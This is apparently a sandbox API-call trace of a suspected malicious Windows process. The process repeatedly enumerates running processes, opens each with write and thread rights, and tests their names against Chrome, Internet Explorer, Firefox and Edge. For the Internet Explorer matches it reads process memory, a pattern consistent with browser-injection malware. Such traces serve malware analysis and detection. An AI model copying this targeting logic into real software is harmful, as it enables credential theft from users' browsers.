	[0203.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.972] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.972] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0203.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.973] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0203.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x279c
	[0203.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.973] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0203.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.974] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.974] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0203.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.974] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0203.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x27a0
	[0203.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.975] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0203.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.976] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.976] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0203.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.976] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.977] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0203.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x27a4
	[0203.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.978] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0203.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.978] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.979] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0203.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.979] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.980] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0203.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x27a8
	[0203.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.981] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0203.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.981] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.981] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0203.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.982] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0203.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x27ac
	[0203.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.983] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0203.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.984] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.984] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0203.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.985] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0203.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x27b0
	[0203.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.986] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0203.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.987] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.987] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0203.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.988] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x27b4
	[0203.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.993] NtQueryInformationProcess (in: ProcessHandle=0x27b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.993] ReadProcessMemory (in: hProcess=0x27b4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.993] ReadProcessMemory (in: hProcess=0x27b4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.993] ReadProcessMemory (in: hProcess=0x27b4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.993] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x27b8
	[0203.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.995] NtQueryInformationProcess (in: ProcessHandle=0x27b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.995] ReadProcessMemory (in: hProcess=0x27b8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.995] ReadProcessMemory (in: hProcess=0x27b8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.995] ReadProcessMemory (in: hProcess=0x27b8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.995] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.995] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x27bc
	[0203.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.996] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.996] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.997] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0203.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x27c0
	[0203.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.998] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0203.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.998] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.999] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0203.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.999] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x27c4
	[0204.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.000] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.000] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.001] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.001] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x27c8
	[0204.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.003] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.003] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.003] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.004] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.004] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0204.004] CloseHandle (hObject=0x188) returned 1
	[0204.004] Sleep (dwMilliseconds=0x64) 
	[0204.111] GetCurrentProcessId () returned 0x110
	[0204.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0204.115] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0204.116] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0204.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0204.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x27cc
	[0204.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.119] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.119] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.120] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.120] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x27d0
	[0204.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.122] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.123] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.123] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.124] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0204.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x27d4
	[0204.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.125] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0204.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.126] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.126] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0204.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.127] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.127] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x27d8
	[0204.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.128] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.128] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.129] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.129] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.129] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0204.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x27dc
	[0204.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.130] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0204.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.130] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.131] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0204.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.131] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0204.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x27e0
	[0204.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.132] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0204.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.132] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.133] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0204.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.133] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0204.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x27e4
	[0204.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.134] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0204.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.134] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.135] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0204.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.135] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0204.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x27e8
	[0204.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.136] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.136] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.136] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.137] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x27ec
	[0204.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.138] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.138] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.138] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.139] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
